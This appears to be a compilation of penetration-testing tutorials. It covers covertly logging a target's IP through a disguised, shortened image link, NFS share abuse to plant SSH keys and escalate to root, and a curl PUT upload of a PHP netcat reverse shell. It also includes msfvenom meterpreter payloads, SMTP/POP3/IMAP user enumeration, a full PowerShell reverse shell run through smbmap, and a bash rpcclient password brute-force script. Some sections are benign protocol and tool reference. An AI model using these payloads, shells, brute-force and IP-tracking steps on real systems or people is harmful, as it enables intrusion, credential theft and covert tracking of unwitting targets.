Find someone Public IP using image URL

This tutorial has been written to find out someone’s public IP using web images links. Note that the result depends on whether the person is using any VPN or spoofing their IP.

How to

1. Upload an image to any image hosting site. In this case I will be using imgbb (

2. Choose a picture, then, click upload

3. Once completed, open the link that has been given

4. Opening that in a browser, it takes us to the image view

5. Right click on the image and click “Open image in a new tab”. Now we have access to the image itself

6. Copy the link in the URL bar, in my case


7. Now, we need to use an IP logger service, some are for free and others paid. I’d use ( . Enter the link to the image, and, click on create URL

8. Agree to the terms and conditions

9. We are now presented with the new Link information

Original URL = URL to image

New URL = URL that needs to be distributed

Access Link = Tracking the accesses

10. Since, the new URL is obviously showing this site, we need to know spoof it using URL shortener service. I’d use (

11. The result is the new link

12. Now distribute that link to the target, once, they open it we will see an entry in access link

13. Click on to see full details

Note: I’m using a VPN. But the overall idea is to track the public IP of the person that clicks on the spoofed image link.

14. Knowing the IP we can use a web service to find location per IP address, I’d use

  • Just enter the IP and search
  • Click check

2049/tcp nfs – Enumeration

The Network File System (NFS) is a client/server application that lets a computer user view and optionally store and update files on a remote computer as though they were on the user’s own computer. The NFS protocol is one of several distributed file system standards for network-attached storage (NAS).

NFS allows the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file (read-only or read-write). NFS uses Remote Procedure Calls (RPCs) to route requests between clients and servers.

Network File System versions 2 and 3 allow the User Datagram Protocol (UDP) running over an IP network to provide stateless network connections between clients and server, but NFSv4.2 requires use of the Transmission Control Protocol (TCP).

NFS advantages NFS is a low-cost solution for network file sharing that is easy to setup as it uses the existing IP infrastructure. A significant advantage of NFS is that it allows for central management, decreasing the need for added software and disk space on individual user systems.

The NFS configuration can be found at /etc/exports & /etc/lib/nfs/xtab

  • cat /etc/exports

Note: Here we can see that /home/vulnix is shared.


If you mount a folder which contains files or folders only accesible by some user (by UID). You can create locally a user with that UID and using that user you will be able to access the file/folder.



1. To enumerate shares on the network you can use showmount command

  • showmount -e


1. We can also use RPC protocol (port 111) to enumerate the port. RPC provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.

  • rpcinfo -p


1. To enumerate using rpcclient

  • rpcclient -p 2049 -I


1. You can run the NSE scripts to enumerate the service

  • nmap -sV –script=nfs-*

Note: If you see any NFS related ACL port open, see /etc/exports

2049/tcp nfs_acl

/etc/exports: the access control list for filesystems which may be exported to NFS clients.

Mount the share

1. Create a new directory, I’d do /tmp/nfs, preferably with the authorized user

  • mkdir /tmp/nfs

2. Knowing the partition location (/home/vulnix) mount it to the new directory /tmp/nfs,

  • sudo mount -t nfs /tmp/nfs -nolock

2. If you try to access the location where this was mounted /tmp/nfs, it will be access denied. You need to add a similar user account locally

  • cd /tmp/nfs

3. Add the user

NFS Server

  • id vulnix

NFS Client (try same UID)

  • id vulnix
  • sudo useradd -u 2008 -m -d /home/vulnix vulnix
  • id vulnix
  • ls -l /home

Note: also set the user password in this case “12345”

  • sudo passwd vulnix
  • 12345

4. Change to the vulnix user and try to access the share.

  • sudo su vulnix
  • whoami
  • cd /tmp/nfs
  • ls -la

5. Since this is a home directory, we can now generate an SSH key to log in as the user vulnix.

Generate SSH key-pair

1. first create a directory named .ssh, in the user home directory, it may already exist, the user can be any local user in the attacking machine, I’d do vry4n

  • mkdir .ssh
  • cd .ssh

2. Now give permissions only to the owner

  • chmod 700 .ssh
  • ls -ld .ssh

3. In your attacking machine, you can generate the ssh keys, in .ssh directory

  • cd .ssh
  • ssh-keygen -t rsa
  • ls -la

4. Read the contents of the public key

  • cat

5. As we know the remote partition is part of ‘vulnix’ home directory, so, we will create a new .ssh folder within it, and add the contents of the just created ‘’, to a new file named ‘authorized_keys’

  • mkdir .ssh
  • cd .ssh
  • vi authorized_keys

6. So far we have done the following

  • Mounted the NFS partition
  • we discovered the partition is only accessed by a user ‘vulnix’
  • we added a local user, with the same UID as in the remote victim server, we managed to access the partition
  • we noticed this was a /home/vulnix directory
  • since, we had write access, we created a /home/vulnix/.ssh folder
  • created local keys on the attacking machines, and, copied the public key value ‘’ to /home/vulnix/.ssh as ‘authorized_keys’ file

7. Now we will try to log in using SSH

  • pwd
  • ssh -i id_rsa vulnix@

8. Now we can see that we are in the remote machine as vulnix user

  • whoami
  • uname -a
  • ifconfig

Privilege escalation

1. Being in the remote server, and having the ability to edit the config file /etc/exports. We can add there any other location, like /root, and do the same procedure to escalate to root.

Note: After the change to the config file, the server requires a reboot, so, this procedure is not recommended on live & running environments.

2. Open the /etc/exports file from any text editor. This time I’d use Nano, I will add the last line to give myself permission to read & access /root via NFS

  • nano /etc/exports
  • save & exit

3. Confirm the changes

  • cat /etc/exports

4. Reboot the server, and then, check the NFS shares, in the image below, you can see the before and after changes

  • showmount -e

5. Now, lets do the same procedures to mount the partition /root, being as root in the local machines

  • mkdir /tmp/nfs_root
  • mount -t nfs /tmp/nfs_root -nolock
  • cd nfs_root
  • ls
  • ls -la

6. Now, lets create the .ssh file in root home directory (/root) from nfs_root mount, lets use the same RSA public key, we used previously

  • mkdir .ssh
  • cd .ssh
  • vi authorized_keys
  • cat authorized_keys

7. Try to log in as root now

  • ssh -i id_rsa root@
  • whoami
  • uname -a

HTTP/HTTPS Enumeration using curl

curl, short for “Client for URLs”, is a command line tool for transferring data using various protocols. This tool has applications in many household products such as tablets, printers, cars, routers, etc.

There is a vast amount of use-cases for curl, such as:

  • FTP upload
  • Proxy support
  • SSL connections
  • HTTP post

This tool also supports the use of all the following protocols: DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET, and TFTP.

Different uses

1. Basic help

  • curl –help

2. Run a basic HTTP GET request

  • curl

3. Return only the HTTP header

-I, –head = Show document info only

-v, –verbose = Make the operation more talkative

  • curl -I

4. List the methods allowed

  • curl -X OPTIONS -v

5. Use a cookie

-b, –cookie <data|filename> = Send cookies from string/file

  • curl localhost:8080/urlstuffhere -b “JSESSIONID=cookievalue”

6. Exploiting PUT method

The PUT method is particularly dangerous. If you upload arbitrary files within

the web root, the first target is to create a backdoor script on the server that will be executed by a server-side module, thereby giving the attacker full control of the application, and often the web server itself. For this example a will create a PHP reverse connection

  • curl -X PUT -d ‘<?php echo shell_exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f”); ?>’ -v

Having a listener on the Kali / Parrot machine waiting for the new file to be executed by visiting the page

  • sudo nc -lvpn 443
  • whoami && hostname

7. If DELETE method is available you can delete files

  • curl -X DELETE -v

8. Check support for HTTP/2

  • curl -I –http2 -v

curl PUT upload & Metasploit

1. Create a payload with MSFVenom

  • msfvenom -l payloads | grep php
  • msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > reverse.php
  • cat reverse.php

2. Start a listener in metasploit

  • sudo msfdb init
  • sudo msfconsole
  • use exploit/multi/hlander
  • set payload php/meterpreter/reverse_tcp
  • set LHOST
  • set LPORT 443
  • exploit

3. Another way to upload a file is using ‘-T’ option, When the server allows PUT method, we can place a file to a directory, also, the application need write permissions to that folder. You also may need to test different http versions

  • curl -T reverse.php –http1.0

4. Since, we already started the listener, lets execute the script, by visiting the hosting page /test, we can see the script uploaded, click on it


5. You can also navigate straight to the script


6. Once the script is executed, we should receive the connection back

7. We could also start the script from CLI

  • curl -X GET -v

Testing SSL/TLS certificates (SSLyze)

It allows you to analyze the SSL/TLS configuration of a server by connecting to it, in order to detect various issues (bad certificate, weak cipher suites, Heartbleed, ROBOT, TLS 1.3 support, etc.).

It is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify misconfigurations affecting their SSL servers.

Key features include:

  • Multi-processed and multi-threaded scanning (it’s fast)
  • SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility
  • Performance testing: session resumption and TLS tickets support
  • Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more
  • Server certificate validation and revocation checking through OCSP stapling
  • Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP and FTP
  • Support for client certificates when scanning servers that perform mutual authentication
  • XML output to further process the scan results

For this example, we will analyze a website certificate as well as a self-signed certificate. To create a certificate visit.


1. To download the tool (it already comes installed in most security distros)

  • git clone
  • ls -ld sslyze

You could also run these commands if you face any issues running the script

  • pip install –upgrade setuptools
  • php install –upgrade sslyze

2. Run basic help

-h, –help = show this help message and exit

  • sslyze -h

3. Check for the tool version

–version = show program’s version number and exit

  • sslyze –version

4. Updade the trust stores

–update_trust_stores = Update the default trust stores used by SSLyze. The latest stores will be downloaded from

  • sudo sslyze –update_trust_stores

How run the application

1. Perform a basic scan on a website

–regular = Regular HTTPS scan; shortcut for –sslv2 –sslv3 –tlsv1 –tlsv1_1 –tlsv1_2 –tlsv1_3 –reneg –resum –certinfo –hide_rejected_ciphers –compression –heartbleed –openssl_ccs –fallback –robot

  • sslyze –regular

2. To save the results to file run

  • sslyze –regular –json_out=results.json
  • cat results.json

To write the file and don’t print anything on the screen use –quet

–quiet = Do not output anything to stdout; useful when using –json_out

  • sslyze –regular –json_out=results.json –quiet

3. To check for a list of targets

–targets_in=TARGETS_IN = Read the list of targets to scan from the file TARGETS_IN. It should contain one host:port per line.

  • vi sites.txt
  • cat sites.txt (
  • sslyze –regular –targets_in=sites.txt

4. Run a slow and less aggressive test, but more accurate

  • sslyze –regular –slow_connection

5. Scanning for some protocols at the target

–starttls=STARTTLS = Perform a StartTLS handshake when connecting to the target server(s).

  • sslyze –starttls=auto

Types of scan

1. Scan for TLS 1.1 support

–tlsv1_1 = Test a server for TLS 1.1 support.

  • sslyze –tlsv1_1

2. Test a server for the OpenSSL CCS Injection

  • sslyze –openssl_ccs

3. Test a server for the TLS_FALLBACK_SCSV mechanism to prevent downgrade attacks.

  • sslyze –fallback

4. Test a server for SSL 3.0 support.

  • sslyze –sslv3

5. Test a server for the OpenSSL Heartbleed vulnerability.

  • sslyze –heartbleed

6. Test a server for the ROBOT vulnerability.

  • sslyze –robot

7. Test a server for the presence of security-related HTTP headers.

  • sslyze –http_headers

8. Test a server for TLS 1.3 early data support.

  • sslyze –early_data

9. Test a server for for insecure TLS renegotiation and client-initiated renegotiation.

  • sslyze –reneg

10. Test a server for TLS compression support, which can be leveraged to perform a CRIME attack.

  • sslyze –compression

11. Test a server for session resumption support using session IDs and TLS tickets.

  • sslyze –resum

12. Test a server for TLS 1.3 support.

  • sslyze –tlsv1_3

13. Test a server for SSL 2.0 support.

  • sslyze –sslv2

14. Retrieve and analyze a server’s certificate(s) to verify its validity.

  • sslyze –certinfo


25,110,143/tcp SMTP,POP3,IMAP – Enumeration

SMTP is an application layer protocol. The client who wants to send the mail opens a TCP connection to the SMTP server and then sends the mail across the connection. The SMTP server is always on listening mode. As soon as it listens for a TCP connection from any client, the SMTP process initiates a connection on that port (25). After successfully establishing the TCP connection the client process sends the mail instantly.

Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with something called the Mail Transfer Agent (MTA) to send your communication to the right computer and email inbox.

How this works

  • First, an e-mail server uses SMTP to send a message from an e-mail client, such as Outlook or Gmail, to an e-mail server.
  • Second, the e-mail server uses SMTP as a relay service to send the e-mail to the receiving e-mail server.
  • Third, the receiving server uses an e-mail client to download incoming mail via IMAP and place it in the inbox of the recipient.


  • SMTP is used to send, relay or forward messages from a mail client, but cannot retrieve messages. Uses port 25, also could use 587 and 465 for TLS
  • IMAP is an e-mail protocol that deals with managing and retrieving e-mail messages, used in receiving emails, not sending them. Uses port 143 or 993 for TLS
  • POP3 is used to retrieve messages from an email server to a mail client, uses port 110, 995 for TLS

Qué es SMTP y cómo puede afectar a mis envíos de email: guía rápida

SMTP Commands

Command Meaning Example
HELO Specify your domain name so that the mail server knows who you are. HELO
MAIL Specify the sender email. MAIL FROM: <>
RCPT Specify the recipient. Issue this command multiple times if you have more than one recipient. RCPT TO: <>
DATA Issue this command before sending the body of the message. The message body must end with the following five letter sequence: “\r\n.\r\n.”
QUIT Terminates the conversation with the server.
EXPN Specify that your recipient is a mailing list.
HELP Asks for help from the mail server.
NOOP Does nothing except to get a response from the server.
RSET Aborts the current conversation and start a new conversation.
SEND Sends a message to a user’s terminal instead of a mailbox.
SAML Sends a message to a user’s terminal and to a user’s mailbox.
SOML Sends a message to a user’s terminal if they are logged on; otherwise, sends the message to the user’s mailbox.
TURN Reverses the role of client and server. This might be useful if the client program can also act as a server and needs to receive mail from the remote computer.
VRFY Verifies that a particular user name of a given mail address exists. Not supported by all mail servers.

SMTP Responses

Code Meaning
211 System status or system help reply.
214 Help message.
220 Server is ready.
221 Server transmission ending.
250 Requested mail action okay, completed.
251 Specified user is not local, but the server will forward the mail message.
354 This is a reply to the DATA command. After getting this, start sending the body of the mail message, ending with “\r\n.\r\n.”
421 The mail service is unavailable. Try again later.
450 The recipient mailbox is busy. Try again later.
451 The requested action was not done. Some error occurred in the mail server.
452 The requested action was not done. The mail server ran out of system storage.
500 The last command contained a syntax error or the command line was too long.
501 The parameters or arguments in the last command contained a syntax error.
502 The mail server has not implemented the last command.
503 The last command was sent out of sequence. For example, you might have sent DATA before sending RECV.
504 One of the parameters of the last command has not been implemented by the server.
550 The recipient mailbox is not found, no access, or command rejected for policy reasons
551 The specified user is not local; part of the text of the message will contain a forwarding address.
552 The recipient mailbox is full. Try again later.
553 The mail address that you specified was not syntactically correct.
554 The mail transaction has encountered unknown errors.

POP3 commands

Command Comment
USER Your user name for this mail server USER Stan
+OK Please enter a password
PASS Your password. PASS SeCrEt
+OK valid logon
QUIT End your session. QUIT
+OK Bye-bye.
STAT Number and total size of all messages STAT
+OK 2 320
LIST Message# and size of message LIST
+OK 2 messages (320 octets)
1 120
2 200

+OK 2 200
RETR message# Retrieve selected message RETR 1
+OK 120 octets follow.
DELE message# Delete selected message DELE 2
+OK message deleted
NOOP No-op. Keeps you connection open. NOOP
RSET Reset the mailbox. Undelete deleted messages. RSET
+OK maildrop has 2 messages (320 octets)
TOP [message] [number] Returns the headers and number of lines from the message TOP 1 10

IMAP Commands

Command Description Usage
APPEND Appends the literal argument as a new message to the end of the specified destination mailbox. Yes
AUTHENTICATE Indicates a Simple Authentication and Security Layer (SASL) authentication mechanism to the server. Yes
CAPABILITY Requests a listing of capabilities that the server supports. Yes
CHECK Requests a checkpoint of the currently selected mailbox. No
CLOSE Permanently removes all messages that have the \Deleted flag set from the currently selected mailbox, and returns to the authenticated state from the selected state. No
COPY/UID COPY Copies the specified message(s) to the end of the specified destination mailbox. Yes
CREATE Creates a mailbox with the given name. Yes
DELETE Permanently removes the mailbox with the given name. No
EXAMINE Identical to SELECT and returns the same output; however, the selected mailbox is identified as read-only. Yes
EXPUNGE Permanently removes all messages that have the \Deleted flag set from the currently selected mailbox. Yes
FETCH/UID FETCH Retrieves data associated with a message in the mailbox. Yes
UID Unique identifier. Yes
LIST Returns a subset of names from the complete set of all names available to the client. Yes
LOGIN Identifies the client to the server and carries the plaintext password authenticating this user. Yes
LOGOUT Informs the server that the client is done with the connection. No
LSUB Returns a subset of names from the set of names that the user has declared as being “active” or “subscribed”. Yes
NOOP Does nothing. It always succeeds. Yes
RENAME Changes the name of a mailbox. No
SEARCH Searches the mailbox for messages that match the given searching criteria. Yes
SELECT Selects a mailbox so that messages in the mailbox can be accessed. Yes
STORE Alters data associated with a message in the mailbox. Yes
SUBSCRIBE Adds the specified mailbox name to the server’s set of “active” or “subscribed” mailboxes as returned by the LSUB command. No
UNSUBSCRIBE Removes the specified mailbox name from the server’s set of “active” or “subscribed” mailboxes as returned by the LSUB command. No

IMAP vs POP3 comparison

Login Exactly equiv No POP parameter for IMAP
VerifyID Exactly equiv
Delete Exactly equiv IMAP commands delete in real time. POP3 waits for POP3_Logout to remove messages permanently. IMAP_SetFlags with \Deleted flag allows you to obtain the same result as the POP3_Delete command
Logout Exactly equiv
SetPrefs Exactly equiv No attachFolder for IMAP, POP3 attachFolder has become optional
GetPrefs Exactly equiv See attachFolder note in SetPrefs
MsgLstInfo Exactly equiv
MsgInfo Exactly equiv
MsgLst Exactly equiv
UIDToMsgNum Exactly equiv IMAP msgUID is a Longint, POP3 msgUID is a string
Download Exactly equiv
POP3_Reset No direct equiv Need combination of IMAP_Search on \Deleted flags and IMAP_SetFlags to remove the \Deleted flag
POP3_BoxInfo No direct equiv Need combination of IMAP_SetCurrentMB &IMAP_MsgLstInfo commands
IMAP_ MsgNumToUID No direct equiv
GetMessage Almost Equiv IMAP is more powerful since it allows you to choose one additional msgPart which is “only body”
POP3_Charset No Equiv IMAP automatically manages charset
IMAP_Capability No Equiv Specific to IMAP protocol
IMAP_ListMBs No Equiv Specific to IMAP protocol
IMAP_GetMBStatus No Equiv Specific to IMAP protocol
IMAP_SetCurrentMB No Equiv Specific to IMAP protocol
IMAP_GetCurrentMB No Equiv Specific to IMAP protocol
IMAP_CloseCurrentMB No Equiv Specific to IMAP protocol
IMAP_CopyToMB No Equiv Specific to IMAP protocol
IMAP_SubscribeMB No Equiv Specific to IMAP protocol
IMAP_CreateMB No Equiv Specific to IMAP protocol
IMAP_DeleteMB No Equiv Specific to IMAP protocol
IMAP_RenameMB No Equiv Specific to IMAP protocol
IMAP_SetFlags No Equiv Specific to IMAP protocol
IMAP_GetFlags No Equiv Specific to IMAP protocol
IMAP_Search No Equiv Specific to IMAP protocol
IMAP_MsgFetch No Equiv Specific to IMAP protocol

Example of SMTP conversation


220 ESMTP Postfix




250 2.1.0 Ok


250 2.1.5 Ok


354 End data with <CR><LF>.<CR><LF>

This is a test message.


250 2.0.0 Ok: queued as 4227FE00C


221 2.0.0 Bye





1. Connect to the server via telnet

  • telnet 110

2. Enumerate users

+OK = exists

-ERR = doesn’t exist

  • USER billydean
  • USER vry4n

3. If you got credentials you could access and read emails, since, POP3 is designed to retrieve emails

USER = username

PASS = password

  • USER mindy
  • PASS Password3

4. List Emails in this profile & read any

  • LIST
  • RETR 2

5. Check for number and size of messages

  • STAT


1. Enumerate Domains

  • nmap -p 110,995 –script pop3-ntlm-info

2. Display what commands are allowed

  • nmap -p 110,995 –script pop3-capabilities



1. Access the service, in this case we care even displayed the domain

  • telnet 25

2. Verify if an email account exists

Pass = If you received a message code 250,251,252 which means the server has accepted the request and user account is valid.

Fail = if you received a message code 550 it means invalid user account

  • vrfy root
  • vrfy vry4n
  • vrfy msfadmin
  • vrfy msfadmin@metasploitable.localdomain


1. Enumerate the service version, and, grab banner

  • use auxiliary/scanner/smtp/smtp_version
  • show options
  • set RHOST
  • exploit

2. Enumerate users using a list

  • use auxiliary/scanner/smtp/smtp_enum
  • show options
  • set RHOST
  • exploit
  • <optional> set USER_FILE new_list.txt

3.Detect an open relay

  • use auxiliary/scanner/smtp/smtp_relay
  • show options
  • set MAILFROM root@metasploitable.localdomain
  • set MAILTO msfadmin@metasploitable.localdomain
  • set RHOST
  • exploit


1. Download the app

2. Display help menu

  • ./ -h

3. Enumerate users using VRFY method

-M mode = Method to use for username guessing EXPN, VRFY or RCPT (default: VRFY)

  • ./ -M VRFY -u msfadmin -t

4. Enumerate users using a list

  • ./ -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t

5. Verify user email address, and domain

  • ./ -M VRFY -D metasploitable.localdomain -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t


1. Download the application

2. Display basic help

3. Validate email addresses using a list from a file

-e <file> = Enable SMTP user enumeration testing and imports email list.

-h <host> = The target IP and port (IP:port).

  • python -e email_list.txt -h

4. Using a specific method

-l <1|2|3> = Specifies enumeration type (1 = VRFY, 2 = RCPT TO, 3 = all).

  • python -e email_list.txt -l 2 -h


Telnel or open SSL

1. Connect to the service using Telnet (unsecure 143) or openssl (secure 993)

  • openssl s_client -crlf -connect
  • ncat –ssl 993
  • telnet 143

2. Knowing credentials you can log in

  • A001 login ayush jiujitsu

3. Testing wrong credentials

  • A001 login vry4n test

4. You can connect to the IMAP service using an email client like thunderbird to retrieve emails. You could also do it from the CLI

  • A001 LIST “” “*”

Here we can see 3 folders Drafts, Sent, Inbox

5. Choose one of those

  • A001 SELECT Drafts

6. Open emails

  • A001 FETCH 1 BODY[]


1. Run scripts to have a little more insight

  • nmap -p 143,993 –script imap-capabilities,imap-ntlm-info


1. Grab version and banner

  • use auxiliary/scanner/imap/imap_version
  • show options
  • set RHOSTS
  • exploit

139,445/tcp – SMB Enumeration

Vulnerabilities in SMB Shares are Medium risk vulnerability that is one of the most frequently found on networks around the world. This issue has been around since at least 1990 but has proven either difficult to detect, difficult to resolve or prone to being overlooked entirely.

Things that might be interesting:

  • check for null session
  • listing of shares
  • domain info
  • password policy
  • RID cycling output

Default shares are C$, ADMIN$, IPC$

Working ports below:

  • Port 135 – Remote Procedure Call (RPC)
  • Port 137 – NetBIOS Name Service
  • Port 138 – NetBIOS Datagram Service
  • Port 139 – NetBIOS Session Service

Information that can be gained includes (but not limited to):

  • Users and groups / shares
  • Operating system information
  • Password policies / Password hashes
  • Privileges / Permissions
  • Available shares

OS targets:

  • Windows server before 2003, 2008, 2012, 2016
  • Older Unix and Linux hosts

Before going more deeper, it’s very important to understand services we are targeting i.e NETBIOS. NETBIOS provides three distinct services:

  • Session service (NetBIOS-SSN) for connection-oriented communication.
  • Name Service (NETBIOS-NS) for name registration and resolution.
  • Datagram distribution service (NetBIOS-DGM) for connectionless communication.

From above three services, we only going to focus on first two of them i.e NetBIOS-SSN & NETBIOS-NS

Session service (NetBIOS-SSN)

  • Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT (Netbios over TCP/IP), the session service runs on TCP port 139.

Name Service (NetBIOS-NS)

  • In order to start sessions or distribute datagrams, an application must register its NetBIOS name using the name service.
  • NetBIOS names are 16 octets in length and vary based on the particular implementation.
  • The name service operates on UDP port 137 (TCP port 137 can also be used, but rarely is).


  • Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell.
  • Samba provides file and print services.
  • Samba runs on most Unix, OpenVMS and Unix-like systems, such as Linux, Solaris, AIX and the BSD variants, including Apple’s OS X Server, and OS X client (version 10.2 and greater).
  • The name Samba comes from SMB (Server Message Block), the name of the standard protocol used by the Microsoft Windows network file system.

13.1 Denial-of-Service Attacks | Security Warrior



All these are modules that can help scan SMB

1. Identify SMB1 version

  • use auxiliary/scanner/smb/smb1
  • set RHOST
  • set RPORT 139
  • exploit

2. Identifies SMB2

  • use auxiliary/scanner/smb/smb2
  • set RHOST
  • set RPORT 139
  • exploit

3. Enumerate Shares

  • auxiliary/scanner/smb/smb_enumshares
  • set RHOST
  • set RPORT 139
  • exploit

4. Enumerate users (can set a list of users and passwords to test)

  • auxiliary/scanner/smb/smb_enumusers
  • set RHOST
  • set RPORT 139
  • exploit
  • show options

These are additional modules that can be used for further enumeration

  • auxiliary/scanner/smb/smb_login
  • auxiliary/scanner/smb/smb_lookupsid
  • auxiliary/scanner/smb/smb_ms17_010
  • auxiliary/scanner/smb/smb_uninit_cred
  • auxiliary/scanner/smb/smb_version
  • auxiliary/scanner/smb/smb_enum_gpp
  • auxiliary/scanner/smb/smb_enumusers_domain


1. Basic SMB enumeration scripts

  • nmap -p 139, 445 –script smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users
  • nmap –script smb-enum* -p 139,445

2. Scanning for known vulnerabilities

  • nmap -p 139, 445 –script smb-vuln-conficker,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-vuln-regsvc-dos,smb-vuln-webexec
  • nmap –script smb-vuln* -p 139,445

3. Host information

  • nmap -p 139, 445 –script smb-os-discovery,smb-protocols,smb-psexec,smb-security-mode,smb-server-stats,smb-system-info

4. Scan for SMB2

nmap -p 139, 445 –script smb2-capabilities,smb2-security-mode,smb2-time,smb2-vuln-uptime


NetBIOS over TCP/IP client used to lookup NetBIOS names

-A, –lookup-by-ip = Do a node status on <name> as an IP Address

  • nmblookup -A


SMB enumeration tool

1. Enumerate Shares

-H HOST = IP of host

-P PORT = SMB port (default 445)

  • smbmap -H
  • smbmap -P 139 -H

2. Enumerate host OS

-v = Return the OS version of the remote host

  • smbmap -v -P 139 -H

3. Do recursive enumeration of directories and files based on a shares

-r [PATH] = List contents of directory, default is to list root of all shares, ex. -r ‘C$\Documents’

  • smbmap -r ‘kathy’ -P 139 -H

-R [PATH] = Recursively list dirs, and files (no share\path lists ALL shares), ex. ‘C$\Finance’

  • smbmap -R ‘kathy’ -P 139 -H

4. Only show READ/WRITE directories

-q = Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when performing a search

  • smbmap -P 139 -H -q

5. Display help menu

  • smbmap –help

6. Download files from a share

–download PATH = Download a file from the remote system, ex.’C$\temp\passwords.txt’

  • smbmap -R ‘tmp’ -P 139 -H
  • smbmap -P 139 -H –download ‘tmp\ls’
  • ls -l
  • cat

7. Upload a file to a share, need write access

–upload SRC DST = Upload a file to the remote system ex. ‘/tmp/payload.exe C$\temp\payload.exe’

  • smbmap -P 139 -H –upload “test.txt” ‘tmp\test.txt’
  • smbmap -R ‘tmp’ -P 139 -H

8. Delete files

–delete PATH TO FILE = Delete a remote file, ex. ‘C$\temp\msf.exe’

  • smbmap -P 139 -H –delete ‘tmp\test.txt’
  • smbmap -R ‘tmp’ -P 139 -H

9. You can use User credentials to check on the shares

-u USERNAME = Username, if omitted null session assumed

-p PASSWORD = Password or NTLM hash

  • smbmap -u SHayslett -p SHayslett -H -P 139

10 You can execute systems commands

-x COMMAND = Execute a command ex. ‘ipconfig /all’

  • smbmap -x ‘ifconfig’ -H

11. Specify a domain and share

-s SHARE = Specify a share (default C$), ex ‘C$’

-d DOMAIN = Domain name (default WORKGROUP)

  • smbmap -d WORKGROUP -s kathy -H

12. Reverse shell

  • smbmap -u jsmith -p ‘R33nisP!nckle’ -d ABC -H -x ‘powershell -command “function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=””””″”””; $port=””””4445″”””;$c=New-Object;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=””””cmd.exe”””” ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length – $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out=”””” “”””}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};”‘


Enum4linux is a tool for enumerating information from Windows and Samba systems.

1. Display basic help

  • enum4linux –help

2. Basic command to run all the scripts

-a = Do all simple enumeration (-U -S -G -P -r -o -n -i)

  • enum4linux -a

3. You can specify a username and password if you know one

-u user specify username to use (default “”)

-p pass specify password to use (default “”)

  • enum4linux -u user -p password

4. Check to see if a user exists on the system

-k user = User(s) that exists on remote system (default: administrator,guest,krbtgt,domain,admins,root,bin,none)

  • enum4linux -k Ronaldo


This is a command utility that tries to scan NetBIOS name servers open on a local or remote TCP/IP network and because it is a first step in finding open shares.

1. Basic help

  • nbtscan

2. Basic scan, it can be an IP or a network range

  • nbtscan

3. Use local port 137 for scans

-r use local port 137 for scans. Win95 boxes respond to this only.

  • nbtscan -r


rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself

1. Display basic help

  • rpcclient –help

2. Stablish a null session, only available in SMB1

-N, –no-pass = Don’t ask for a password

  • rpcclient -U “” -N

3. Having a communication you can enumerate more than you think

  • srvinfo

  • querydominfo

  • getdompwinfo

  • netshareenum

4. Using credentials can help explore more than what null session provides

  • rpcclient -U james
  • <Password> – J@m3s_P@ssW0rd!

5. Enumerate users (RID)

  • enumdomusers

  • queryuser 0x1f4

  • lookupnames administrator

6. Enumerate groups (RID)

  • enumdomgroups

  • querygroup 0x201

  • querygroupmem 0x201

  • enumalsgroups domain

  • enumalsgroups builtin

7. Enumerate credentials

  • getdompwinfo

  • getusrdompwinfo 0x1f4

8. You can also try to brutefoce by running a command, and test passwords, we know that min_password_length is 7 char


  • rpcclient -U james -c “getusername;quit”
  • rpcclient -U james%J@m3s_P@ssW0rd! -c “getusername;quit”


  • rpcclient -U james -c “getusername;quit”

Bash script

1. This script will go through a password list and test the rpcclient command until it guesses the password, then writes a file named password_result.txt with the actual hit

  • vi

for i in `cat pass.txt`; do

if rpcclient -U “james%$i” -c “getusername;quit”; then

echo “$i” > password_result.txt

echo “[+] The password is $1 and has been saved in password_result.txt”



2. Create a wordlist

  • cat pass.txt

3. Run the script

  • bash

4. Read the result

  • cat password_result.txt


1. Display help
